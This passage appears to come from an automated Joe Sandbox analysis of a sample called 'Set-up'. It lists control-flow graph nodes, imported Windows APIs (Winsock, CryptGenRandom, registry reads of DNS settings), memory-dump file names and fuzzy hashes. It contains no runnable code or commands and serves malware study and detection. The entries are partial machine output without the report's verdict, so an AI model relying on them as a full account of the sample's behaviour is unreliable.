                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                      • GetStartupInfoA.KERNEL32 ref: 00511433
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                      • String ID:
                                      • API String ID: 3873122205-0
                                      • Opcode ID: 4f70f2dee93e80c74444dbd7208b17c1d567712f034c653bafe819499a2aacae
                                      • Instruction ID: a14da17ed3f471e24f981346caaf104145da57ceaeec9b5c2fb9e6ba30176f55
                                      • Opcode Fuzzy Hash: 4f70f2dee93e80c74444dbd7208b17c1d567712f034c653bafe819499a2aacae
                                      • Instruction Fuzzy Hash: 3481BFB99046118FEB10EFA8D9853AEBBF0FB46300F04486DEA95C7251D7759884CB86

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1182 898e90-898eb8 _open 1183 898eba-898ec7 1182->1183 1184 898eff-898f2c call 899f70 1182->1184 1185 898ec9 1183->1185 1186 898ef3-898efa _exit 1183->1186 1193 898f39-898f51 _write 1184->1193 1188 898ecb-898ecd 1185->1188 1189 898ee2-898ef1 1185->1189 1186->1184 1191 898ed3-898ed6 1188->1191 1192 9c29f0-9c2a07 1188->1192 1189->1185 1189->1186 1191->1189 1194 898ed8 1191->1194 1197 9c2a09 1192->1197 1198 9c2a0a-9c2a3f CryptAcquireContextA 1192->1198 1195 898f30-898f37 1193->1195 1196 898f53-898f5e _close 1193->1196 1194->1189 1195->1193 1195->1196 1196->1183 1199 9c2a59-9c2a7b CryptGenRandom 1198->1199 1200 9c2a41-9c2a4f 1198->1200 1202 9c2a7d-9c2a84 1199->1202 1203 9c2a86-9c2a9b CryptReleaseContext 1199->1203 1201 9c2a55-9c2a58 1200->1201 1202->1203 1204 9c2a9d-9c2ab2 CryptReleaseContext 1202->1204 1203->1200 1204->1201
                                      APIs
                                      • _open.MSVCRT ref: 00898EAD
                                      • _exit.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00898EFA
                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00898F4A
                                      • _close.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00898F59
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: _close_exit_open_write
                                      • String ID: terminated$@$CONOUT$
                                      • API String ID: 28676597-491099378
                                      • Opcode ID: f54552f4d7a7d3e6551b1f100bbf564c4b04e19b608e6df4a33f5810d950dcc4
                                      • Instruction ID: cce9d0ead32f409bb662cf026e4e7f25963b5c9a74fd54261f5c3df39c7d7842
                                      • Opcode Fuzzy Hash: f54552f4d7a7d3e6551b1f100bbf564c4b04e19b608e6df4a33f5810d950dcc4
                                      • Instruction Fuzzy Hash: 344118B4904206CFDB10EF79D844BAEBBE4FB49314F048A2DE899D7290EB74D845CB56

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1205 5205b0-5205b7 1206 5207ee 1205->1206 1207 5205bd-5205d4 1205->1207 1208 5207e7-5207ed 1207->1208 1209 5205da-5205e6 1207->1209 1208->1206 1209->1208 1210 5205ec-5205f0 1209->1210 1211 5205f6-520620 call 527350 call 5170b0 1210->1211 1212 5207c7-5207cc 1210->1212 1217 520622-520624 1211->1217 1218 52066a-52068c call 54dec0 1211->1218 1212->1208 1220 520630-520655 call 5170d0 call 5203c0 call 527450 1217->1220 1223 520692-5206a0 1218->1223 1224 5207d6-5207e3 call 527380 1218->1224 1251 52065b-520668 call 5170e0 1220->1251 1252 5207ce 1220->1252 1226 5206a2-5206a4 1223->1226 1227 5206f4-5206f6 1223->1227 1224->1208 1230 5206b0-5206e4 call 5273b0 1226->1230 1232 5207ef-52082b call 523000 1227->1232 1233 5206fc-5206fe 1227->1233 1230->1224 1250 5206ea-5206ee 1230->1250 1244 520831-520837 1232->1244 1245 520a2f-520a35 1232->1245 1238 52072c-520754 1233->1238 1240 520756-52075b 1238->1240 1241 52075f-52078b getsockopt 1238->1241 1246 520707-520719 WSAEventSelect 1240->1246 1247 52075d 1240->1247 1248 520700-520703 1241->1248 1249 520791-520796 1241->1249 1255 520861-52087e WSAWaitForMultipleEvents 1244->1255 1256 520839-520842 call 526fa0 1244->1256 1253 520a37-520a3a 1245->1253 1254 520a3c-520a52 1245->1254 1246->1224 1260 52071f 1246->1260 1257 520723-520726 1247->1257 1248->1246 1249->1248 1258 52079c-5207c2 call 5176a0 1249->1258 1250->1230 1259 5206f0 1250->1259 1251->1218 1251->1220 1252->1224 1253->1254 1254->1224 1263 520a58-520a81 call 522f10 1254->1263 1266 520882-52088d 1255->1266 1268 520847-52084c 1256->1268 1257->1232 1257->1238 1258->1248 1259->1227 1260->1257 1263->1224 1279 520a87-520a97 call 526df0 1263->1279 1270 520893-5208b1 1266->1270 1271 520970-520975 1266->1271 1275 520852 1268->1275 1276 520a9c-520aa4 1268->1276 1277 5208c8-5208f7 WSAEnumNetworkEvents 1270->1277 1272 52097b-520989 call 5170b0 1271->1272 1273 520a19-520a2c WSAResetEvent 1271->1273 1272->1273 1288 52098f-52099e 1272->1288 1273->1245 1275->1255 1280 520854-52085f 1275->1280 1276->1224 1281 5208f9-5208fb 1277->1281 1282 5208fd-520925 1277->1282 1279->1224 1280->1266 1283 520928-52093f WSAEventSelect 1281->1283 1282->1283 1286 5208b3-5208c2 1283->1286 1287 520945-52096b 1283->1287 1286->1271 1286->1277 1287->1286 1290 5209b0-5209c1 call 5170d0 1288->1290 1293 5209c3-5209c7 1290->1293 1294 5209a0-5209ae call 5170e0 1290->1294 1296 5209e8-520a03 WSAEnumNetworkEvents 1293->1296 1294->1273 1294->1290 1297 5209d0-5209e6 WSAEventSelect 1296->1297 1298 520a05-520a17 1296->1298 1297->1294 1297->1296 1298->1297
                                      APIs
                                      • WSAEventSelect.WS2_32(?,?,?), ref: 00520711
                                      • getsockopt.WS2_32(?,0000FFFF,00001008,?,00000004), ref: 00520783
                                      • WSAWaitForMultipleEvents.WS2_32(00000001,?,00000000,00000000,00000000), ref: 0052086F
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005208EF
                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 00520934
                                      • WSAEventSelect.WS2_32(?,?,00000000), ref: 005209DC
                                      • WSAEnumNetworkEvents.WS2_32(?,00000000,00000000), ref: 005209FB
                                      • WSAResetEvent.WS2_32(?), ref: 00520A1F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: Event$EventsSelect$EnumNetwork$MultipleResetWaitgetsockopt
                                      • String ID: N=Q$multi.c
                                      • API String ID: 3264668090-4211762853
                                      • Opcode ID: bd6803a5b5979b188944fe2744244604f80e2e6888a7b4b04fcf239bd45853e5
                                      • Instruction ID: bc23d85c428fd6698ce12e30ae97ec2f72488fb8948f76c618a0b79970f914df
                                      • Opcode Fuzzy Hash: bd6803a5b5979b188944fe2744244604f80e2e6888a7b4b04fcf239bd45853e5
                                      • Instruction Fuzzy Hash: AFD1CF756093069FE710DF24E885BAB7BE9FF95308F08582CF885822D2E774E945CB52

                                      Control-flow Graph

                                      Strings
                                      • error CryptGenRandom 0x%08lx, xrefs: 009B8FE9
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: error CryptGenRandom 0x%08lx
                                      • API String ID: 0-1222942552
                                      • Opcode ID: e67713e7a268cf508fd487c4a072121edefe94b6371c06a53f7919806dc0999d
                                      • Instruction ID: b91a5be093e32e03dd28a26111a0cc2a20110f64dbb3a0ea6c324975c5eb5198
                                      • Opcode Fuzzy Hash: e67713e7a268cf508fd487c4a072121edefe94b6371c06a53f7919806dc0999d
                                      • Instruction Fuzzy Hash: A141B0B95093019FD700EF78D58975EBBE4BB89314F458A2DF889C7364EB74C5488B82
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: Sleep
                                      • String ID:
                                      • API String ID: 3472027048-0
                                      • Opcode ID: e1a6f52a6e51f2e71e7302860bd8e29b55c97b8f19bf1d6a8c5bef3c637daa19
                                      • Instruction ID: a560fef478f4cae4c22b293c831ed83bc47226edcf0cf7f5e1d0f84a481daeea
                                      • Opcode Fuzzy Hash: e1a6f52a6e51f2e71e7302860bd8e29b55c97b8f19bf1d6a8c5bef3c637daa19
                                      • Instruction Fuzzy Hash: 0491043460C32D8BD735DB28E8947BB7AD5FFDA320F148A2CE895821D4D7749C50DA91
                                      APIs
                                      • Sleep.KERNEL32 ref: 005111B7
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
                                      • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
                                      • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051140C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterSleepUnhandled__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                      • String ID:
                                      • API String ID: 1209083157-0
                                      • Opcode ID: 1796820d4626cf782f6fba6b69efd79871de3ca284ff646766a69c1d977e6e21
                                      • Instruction ID: db7b770cbcd51513b7b4258301ec420a2aababcdb3353544bc6faf4077ff6966
                                      • Opcode Fuzzy Hash: 1796820d4626cf782f6fba6b69efd79871de3ca284ff646766a69c1d977e6e21
                                      • Instruction Fuzzy Hash: 18413BB4A047118BEB10EFA8E98479EBBF0FB49300F05496DE98597350DB709884CB96
                                      APIs
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
                                      • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
                                      • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                        • Part of subcall function 00898A20: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(?,?,?,?,?,?,005113EF), ref: 00898A2A
                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051140C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterUnhandled__acrt_iob_func__p__acmdln_initterm_set_invalid_parameter_handlermemcpystrlen
                                      • String ID:
                                      • API String ID: 2715571461-0
                                      • Opcode ID: cdf9afb287e74d172b28f239f2e6e18e445a4da4fe88bb03f99eb24f463a7cd1
                                      • Instruction ID: 6df92a81c8f1ae286ef71084ed1c679ea0fb7314002e8e74efbe419a911b7ad7
                                      • Opcode Fuzzy Hash: cdf9afb287e74d172b28f239f2e6e18e445a4da4fe88bb03f99eb24f463a7cd1
                                      • Instruction Fuzzy Hash: 3F4117B89047118BEB10EFA8E98579EBBF0FB4A300F15486DEA8597351DB749884CB46
                                      APIs
                                      • Sleep.KERNEL32 ref: 005111B7
                                      • SetUnhandledExceptionFilter.KERNEL32 ref: 00511238
                                      • _set_invalid_parameter_handler.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 0051124D
                                      • __p__acmdln.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00511261
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 005112EB
                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00511323
                                      • malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 0051132E
                                      • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00511344
                                      • GetStartupInfoA.KERNEL32 ref: 00511433
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: malloc$ExceptionFilterInfoSleepStartupUnhandled__p__acmdln_set_invalid_parameter_handlermemcpystrlen
                                      • String ID:
                                      • API String ID: 3873122205-0
                                      • Opcode ID: 0eefb0f36392f3f19e2b5691aff79c047e59570ee04d2030f3bd25364e3917ce
                                      • Instruction ID: 4119a358ab01ddcb6446015457caeaf65320b66144756c2466de8a3bba28a6a6
                                      • Opcode Fuzzy Hash: 0eefb0f36392f3f19e2b5691aff79c047e59570ee04d2030f3bd25364e3917ce
                                      • Instruction Fuzzy Hash: F3517E759047118FEB10EFA8E98479EBBF0FB4A300F15496CEA55DB350DB719880CB86
                                      APIs
                                      • recvfrom.WS2_32(?,?,?,00000000,00001001,?), ref: 005DA90C
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1855271146.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                      • Associated: 00000000.00000002.1855253681.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.00000000009C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855601017.0000000000AE6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855663213.0000000000AE7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855682277.0000000000AEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855702572.0000000000AEB000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855719884.0000000000AEF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855735888.0000000000AF2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855838625.0000000000C4D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855869175.0000000000C4E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1855887304.0000000000C52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_510000_Set-up.jbxd
                                      Similarity
                                      • API ID: recvfrom
                                      • String ID:
                                      • API String ID: 846543921-0
                                      • Opcode ID: ebd45d5c022e0064f47000a12ba31fc54b669272f2e174247f58a5e4aa33891e
                                      • Instruction ID: 738a5d709e5fb472c3a396d759c9c834ce607f29d5ed19704715b7455e738902
                                      • Opcode Fuzzy Hash: ebd45d5c022e0064f47000a12ba31fc54b669272f2e174247f58a5e4aa33891e
                                      • Instruction Fuzzy Hash: 7AF01D75108348AFD2209F45DC48D6BBBEDFFC9754F05456EF958133119271AE10CA72
                                      APIs
                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA499
                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA4FB
                                      • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 005CA531
                                      • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 005CAA19
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CAA4C
                                      • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 005CAA97
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 005CAAE9
                                      • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 005CAB30
                                      • RegCloseKey.KERNELBASE(?), ref: 005CAB6A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 005CAB82
                                      • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CABAD
                                      • RegQueryValueExA.ADVAPI32(?,SearchList,00000000,00000000,00000000,00000000), ref: 005CABF0
                                      • RegCloseKey.ADVAPI32(?), ref: 005CAC2A
                                      • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 005CAC46
                                      • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 005CAC71
                                      • RegQueryValueExA.ADVAPI32(?,PrimaryDNSSuffix,00000000,00000000,00000000,00000000), ref: 005CACB4
                                      • RegCloseKey.ADVAPI32(?), ref: 005CACEE
